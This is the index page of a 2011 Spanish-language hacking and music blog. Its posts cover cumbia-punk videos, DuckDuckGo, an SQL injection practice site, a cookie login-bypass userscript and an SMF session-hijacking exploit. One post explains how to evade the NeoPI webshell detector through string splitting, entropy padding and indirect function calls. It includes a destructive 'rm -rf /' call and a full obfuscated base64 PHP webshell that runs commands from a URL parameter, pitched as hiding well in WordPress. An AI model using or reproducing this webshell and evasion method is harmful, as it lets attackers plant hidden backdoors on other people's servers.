El rincon de seth

Punkycacos live at Speed King

Posted in /dev/urandom by elrincondeseth on noviembre 2, 2011

Para todos los fans
La musica empieza mas o menos a los 20 minutos

1 comment

Sos bueno con las inyecciones sql? rompeme la web

Posted in Vulnerabilidades by elrincondeseth on septiembre 17, 2011

Hice una web para que que practiquen sqli con y sin filtros
Va a estar online minimo una semana (a menos que me rompan todo antes) http://vepeese.xdblog.com.ar/

1 comment

Coso para bypassear logins

Posted in Vulnerabilidades by elrincondeseth on agosto 24, 2011

Dejo este script. Hay que instalarlo (hace falta greasemonkey), ir a un login y empezar a apretar botones para ver si alguno te loguea.
Lo que hace es meter cookies para tratar de explotar esto.

http://xd-blog.com.ar/descargas/programas/cookie_login_bypass/script.1.0.user.js

1 comment

Bypasseando NeoPI

Posted in PHP by elrincondeseth on agosto 17, 2011

Estaba perdiendo el tiempo en reddit y vi NeoPI. Es un programa que detecta webshells y está bastante bueno, encuentra emelco, una shell osfuscada y una wso metida al final de una imagen.
Tiene varias formas de detectar las shells, pero todas se puede bypassear:

  • Strings largas: Si codificas con base64 una shell comun vas a tener un string muy largo y va a saltar al toque. Simplemente metemos espacios para separar el string, base64_decode los va a ignorar
  • Entropia: Cuanta mas variado es el contendido del archivo, mas va a llamar la atención: 
    	def calculate(self,data,filename):
		"""Calculate the entropy for 'data' and append result to entropy_results array."""

		if not data:
			return 0
		entropy = 0
		for x in range(256):
			p_x = float(data.count(chr(x)))/len(data)
			if p_x > 0:
				entropy += - p_x * math.log(p_x, 2)
		self.results.append({"filename":filename, "value":entropy})
		return entropy

    Si metemos espacios despues de cada caracter del string en base64 aumentamos el largo del archivo y la entropia va a ser menor. Tambien se puede agregar un comentario con aaaaaaaaaaaaaaaaaaaaaaaaa(metele a’s hasta que la entropia baje lo suficiente)

  • Indice de coincidencia: No le di bola, la una shell que encontró fue la que estaba despues de una imagen
  • Firmas: Hay que evitar usar eval(), system() y demas funciones comunes en las webshells. Se pueden usar funciones globales asi: 
    $a = 'sys'.'tem'; 
$a('rm -rf /');

    eval() no es una función pero se puede reemplazar por algo asi: 

    file_put_contents('/tmp/asd', 'codigo'); 
include('/tmp/asd');

Este codigo se esconde joya en un directorio de wordpress 3:

<?PHP
$b = 'bas'.'e64'.'_de'.'code';
file_put_contents('/tmp/asd', $b('P D 9 Q S F A K Z n V u Y 3 R p b 2 4 g b G x l a H M o J G N t Z C w g J G F y c m F 5 I D 0 g d H J 1 Z S l 7 C i A g I C B p Z i A o I W V t c H R 5 K C R j b W Q p K X s K I C A g I C A g I C B p Z i A o Y G V j a G 8 g Y W A p e y A k c 2 F s a W R h W 1 0 9 K G A k Y 2 1 k Y C k 7 I C R z Y W x p Z G F b X T 0 n T W 9 k b z o g Y C R j b W R g J z t 9 C i A g I C A g I C A g C i A g I C A g I C A g Z W x z Z W l m I C h z a G V s b H B v c G V u K C d l Y 2 h v I G E n K S l 7 J H N h b G l k Y V t d P X N o Z W x s c G 9 w Z W 4 o J G N t Z C k 7 I C R z Y W x p Z G F b X T 0 n T W 9 k b z o g c G 9 w Z W 4 o J G N t Z C k n O 3 0 K I C A g I C A g I C A K I C A g I C A g I C B l b H N l a W Y g K H N o Z W x s X 2 V 4 Z W M o J 2 V j a G 8 g Y S c p K X s k c 2 F s a W R h W 1 0 9 c 2 h l b G x f Z X h l Y y g k Y 2 1 k K T s g J H N h b G l k Y V t d P S d N b 2 R v O i B z a G V s b F 9 l e G V j K C R j b W Q p J z t 9 C i A g I C A g I C A g C i A g I C A g I C A g Z W x z Z W l m I C h l e G V j K C d l Y 2 h v I G E n K S l 7 J H N h b G l k Y V t d P W V 4 Z W M o J G N t Z C k 7 I C R z Y W x p Z G F b X T 0 n T W 9 k b z o g Z X h l Y y g k Y 2 1 k K S c 7 f Q o g I C A g I C A g I A o g I C A g I C A g I G V s c 2 V p Z i A o c 3 l z d G V t c m V 0 d X J u K C d l Y 2 h v I G E n K S l 7 J H N h b G l k Y V t d P X N 5 c 3 R l b X J l d H V y b i g k Y 2 1 k K T s g J H N h b G l k Y V t d P S d N b 2 R v O i B z e X N 0 Z W 0 o J G N t Z C k n O 3 0 K I C A g I C A g I C A K I C A g I C A g I C B l b H N l a W Y g K H B h c 3 N 0 a H J 1 c m V 0 d X J u K C d l Y 2 h v I G E n K S l 7 J H N h b G l k Y V t d P X B h c 3 N 0 a H J 1 c m V 0 d X J u K C R j b W Q p O y A k c 2 F s a W R h W 1 0 9 J 0 1 v Z G 8 6 I H B h c 3 N 0 a H J 1 K C R j b W Q p J z t 9 C i A g I C A g I C A K I C A g I C A g I C B l b H N l a W Y g K H N o Z W x s c H J v Y 2 9 w Z W 4 o J 2 V j a G 8 g Y S c p K X s k c 2 F s a W R h W 1 0 9 c 2 h l b G x w c m 9 j b 3 B l b i g k Y 2 1 k K T s g J H N h b G l k Y V t d P S d N b 2 R v O i B w c m 9 j X 2 9 w Z W 4 o J G N t Z C k n O 3 0 K I C A g I C A g I A o g I C A g I C A g I G V s c 2 V p Z i A o c 2 h l b G x w Y 2 5 0 b C g n Z W N o b y B h J y k p e y R z Y W x p Z G F b X T 1 z a G V s b H B j b n R s K C R j b W Q p O y A k c 2 F s a W R h W 1 0 9 J 0 1 v Z G 8 6 I H B j b n R s X 2 V 4 Z W M o J G N t Z C k n O 3 0 K I C A g I C A g I C A K I C A g I C A g I C B p Z i A o J G F y c m F 5 K X s K I C A g I C A g I C A g I C A g c m V 0 d X J u I C R z Y W x p Z G E 7 C i A g I C A g I C A g f W V s c 2 V 7 C i A g I C A g I C A g I C A g I H J l d H V y b i A k c 2 F s a W R h W z B d O w o g I C A g I C A g I H 0 K I C A g I H 1 l b H N l e w o g I C A g I C A g I H J l d H V y b i B m Y W x z Z T s K I C A g I H 0 K f Q p m d W 5 j d G l v b i B z a G V s b H B v c G V u K C R j b W Q p e w o v K i B m d W V u d G U 6 I G F u d G l j a G F 0 I H d l Y n N o Z W x s I H Y x L j M g K i 8 K I C B p Z i g k Z n A g P S B w b 3 B l b i g k Y 2 1 k L C d y J y k p e y A K I C A g I C R y Z X N 1 b H Q g P S A n J z s K I C A g I H d o a W x l K C F m Z W 9 m K C R m c C k p e y R y Z X N 1 b H Q u P W Z y Z W F k K C R m c C w x M D I 0 K T t 9 C i A g I C B w Y 2 x v c 2 U o J G Z w K T s K I C A K I C A g I C R y Z X Q g P S A k c m V z d W x 0 O w o g I C A g J H J l d C A 9 I G N v b n Z l c n R f Y 3 l y X 3 N 0 c m l u Z y g k c m V 0 L C d k J y w n d y c p O w o g I C A g c m V 0 d X J u I C R y Z X Q 7 C i A g f W V s c 2 V 7 C i A g I C B y Z X R 1 c m 4 g Z m F s c 2 U 7 C i A g f Q p 9 C m Z 1 b m N 0 a W 9 u I H N 5 c 3 R l b X J l d H V y b i g k Y 2 1 k K X s K I C A g I G 9 i X 2 Z s d X N o K C k 7 C i A g I C B v Y l 9 z d G F y d C g p O w o g I C A g I C A g I H N 5 c 3 R l b S g k Y 2 1 k K T s K I C A g I C A g I C A k c 2 F s a W R h I D 0 g b 2 J f Z 2 V 0 X 2 N s Z W F u K C k 7 C i A g I C B v Y l 9 l b m R f Y 2 x l Y W 4 o K T s K I C A g I H J l d H V y b i A k c 2 F s a W R h O w p 9 C m Z 1 b m N 0 a W 9 u I H B h c 3 N 0 a H J 1 c m V 0 d X J u K C R j b W Q p e w o g I C A g b 2 J f Z m x 1 c 2 g o K T s K I C A g I G 9 i X 3 N 0 Y X J 0 K C k 7 C i A g I C A g I C A g c G F z c 3 R o c n U o J G N t Z C k 7 C i A g I C A g I C A g J H N h b G l k Y S A 9 I G 9 i X 2 d l d F 9 j b G V h b i g p O w o g I C A g b 2 J f Z W 5 k X 2 N s Z W F u K C k 7 C i A g I C B y Z X R 1 c m 4 g J H N h b G l k Y T s K f Q p m d W 5 j d G l v b i B z a G V s b H B y b 2 N v c G V u K C R j b W Q p e w o g I C A g J G R l c 2 N y a X B 0 b 3 J z c G V j I D 0 g Y X J y Y X k o C i A g I C A g I C A w I D 0 + I G F y c m F 5 K C d w a X B l J y w g J 3 I n K S w g C i A g I C A g I C A x I D 0 + I G F y c m F 5 K C d w a X B l J y w g J 3 c n K S w g C i A g I C A g I C A y I D 0 + I G F y c m F 5 K C d w a X B l J y w g J 3 c n K S A K I C A g I C k 7 C i A g I A o g I C A g J H B y b 2 N l c 3 M g P S B w c m 9 j X 2 9 w Z W 4 o J G N t Z C w g J G R l c 2 N y a X B 0 b 3 J z c G V j L C A k c G l w Z X M p O w o g I C A g C i A g I C B p Z i A o a X N f c m V z b 3 V y Y 2 U o J H B y b 2 N l c 3 M p K S B 7 I C A g I A o g I C A g I C A g I G Z j b G 9 z Z S g k c G l w Z X N b M F 0 p O w o g I C A g I C A g I C R z Y W x p Z G E g P S B z d H J l Y W 1 f Z 2 V 0 X 2 N v b n R l b n R z K C R w a X B l c 1 s x X S k 7 C i A g I C A g I C A g Z m N s b 3 N l K C R w a X B l c 1 s x X S k 7 C i A g I C A g I C A g Z m N s b 3 N l K C R w a X B l c 1 s y X S k 7 C i A g I C A g I C A g J H J l d H V y b l 9 2 Y W x 1 Z S A 9 I H B y b 2 N f Y 2 x v c 2 U o J H B y b 2 N l c 3 M p O w o g I C A g I C A g I H J l d H V y b i A k c 2 F s a W R h O w o g I C A g f W V s c 2 V 7 C i A g I C A g I C A g c m V 0 d X J u I G Z h b H N l O w o g I C A g f Q p 9 C m Z 1 b m N 0 a W 9 u I H N o Z W x s c G N u d G w o J G N t Z C l 7 C i A g I C B p Z i g h Z n V u Y 3 R p b 2 5 f Z X h p c 3 R z K C d w Y 2 5 0 b F 9 l e G V j J y k p e w o g I C A g I C A g I H J l d H V y b i B m Y W x z Z T s K I C A g I H 0 K I C A g I C R h c m d z I D 0 g Z X h w b G 9 k Z S g n I C c s J G N t Z C k 7 C i A g I C A k c G F 0 a C A 9 I C R h c m d z W z B d O w o g I C A g d W 5 z Z X Q o J G F y Z 3 N b M F 0 p O w o g I C A g a W Y o c G N u d G x f Z X h l Y y g k c G F 0 a C w k Y X J n c y k 9 P T 1 m Y W x z Z S l 7 C i A g I C A g I C A g c m V 0 d X J u I G Z h b H N l O w o g I C A g f W V s c 2 V 7 C i A g I C A g I C A g c m V 0 d X J u I C d F b C B j b 2 1 h b m R v I G Z 1 Z S B l a m V j d X R h Z G 8 s I H B l c m 8 g b m 8 g c 2 U g c H V k b y B y Z W N 1 c G V y Y X I g b G E g c 2 F s a W R h J z s K I C A g I H 0 K f Q o =                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                 '));
include('/tmp/asd');
echo llehs($_GET['c'], false);

4 comments

Simple Machines forum (SMF) 2.0 session hijacking

Posted in Full disclosure, Vulnerabilidades by elrincondeseth on agosto 8, 2011

X-C3ll encontró la vulnerabilidad y después yo hice el exploit y encontré otra forma mas copada de explotarla. Pueden ver su primer post acá
Simple Machines forum (SMF) 2.0 session hijacking

leave a comment

Reto 5

Posted in Vulnerabilidades by elrincondeseth on agosto 5, 2011

De la serie “…te regalo un peluche de…: http://xd-blog.com.ar/juego/5/

leave a comment

DuckDuckGo

Posted in Uncategorized by elrincondeseth on agosto 3, 2011

Hace mas o menos cinco meses que mi buscador favorito es duckduckgo. Comparandolo con yahoo o bing tiene una ventaja muy obvia: no es una mierda. Al compararlo con google el asunto se pone mas peleado asi que voy a linkear bastante.
Si sos de los que se preocupan por su privacidad, ddg te va a gustar porque no te sigue ni te cambia los resultados, evita que tu navegador mande el referer en los links salientes y tiene https. Capaz queres ver la politica de privacidad (una de las primeras que puedo entender de una)
Si sos de los que les gusta modificar todo, mirá las opciones, podes modificar varias cosas
Si queres ahorrar tiempo, mirá esto y esto. Lo que mas te va a ahorrar tiempo son los !bang, probá poniendo !taringa, !g o !gi al final o al principio de tu busqueda.
Si usas firefox, instalá el addon para tenerlo como buscador predeterminado.

Los unicos dos problemas que le encuentro es que se confunde con algunas búsquedas y le falta indexar mas webs para otras, pero en esos casos (que son pocos) pongo !g y ya estoy de vuelta en google.
Dejo algunas busquedas para que vean lo groso que es.

https://duckduckgo.com/, #duckduckgo en freenode

leave a comment

RFI por ftp

Posted in Vulnerabilidades by elrincondeseth on julio 8, 2011

Hace bastante estaba aburrido e hice que mi pagina loguee algunos intentos de ataque. Generalmente se ve alguien que mete una comilla, algunos bots que llegan por un enlace viejo (quedan logueados como ataque por un error), algun escaneo de acunetix, scanners de inyecciones sql en plugins de joomla/phpbb/algun cms que esté en exploitdb o scanners de rfi (todavia funcionan?). Generalmente los scanners de rfi ponen un archivo externo al que se accede por http, pero esta vez parece que trataron de bypassear algunos filtros:

Capaz hay algun brasilero leyendo este texto sobre bypass de filtros?

Buscando la url en google y ddg para ver cuantas webs habian escaneado me encontre con esto:
null

2 comments

Sos tan ciego que no ves a un gorila

Posted in Uncategorized by elrincondeseth on julio 2, 2011

Y te lo pruebo: http://www.theinvisiblegorilla.com/videos.html

1 comment

Mas cumbia punk!

Posted in Uncategorized by elrincondeseth on junio 13, 2011

En mi intento de influenciar futuros músicos para lograr que en el futuro podamos escuchar los mejores temas del retutu tocados mas rapido y con bateria en el luna park,  sigo linkeando videos de estas mezclas entre cumbia y punk. Hay un par de temas medio pop, pero fueron lo mejor que encontré, si alguien hace un cover de yo no se mañana tocandolo como tukera me avisa.

Una calle me separa – Patada en la nuca

La danza de los mirlos

Su florcita – Placas 92

Su florcita – Turi

La fiesta de tu hermana – Telefono descompuesto

El humo de mi fasito

Yo no se mañana – Expedición ladines

Yo no se mañana – The rotten

Un par de videos que no son cumbia punk pero la rompen:

Nalga – Cumbiagore sabrosona

Para no verte mas – The rotten

En mi exaustiva investigación de la cumbiancha de tres tonos encontré un par de bandas que se zarpan en grosas. Pongo un par de videos, pero hay que bajarse los cds:

El talibán del amor – Dead menems

Socios de paja – Dead menems

Los chetos son buenos – Dead menems

La china es cumbianchera – Kumbia queers

Metamorfosis adolescente – Kumbia queers

Chica de metal – Kumbia queers

No se por que colgué y no puse los videos antes, pero tocó punkycacos en vivo en parque centenario y estan todos los videos en youtube: Anarkia para los guachines

 

Cuando tenga ganas hago un post re groso sobre oxizakre. Si quieren que lo haga antes, pueden donar bitcoins o fernucos.

3 comments

Seguir

Recibe cada nueva publicación en tu buzón de correo electrónico.

%d bloggers like this: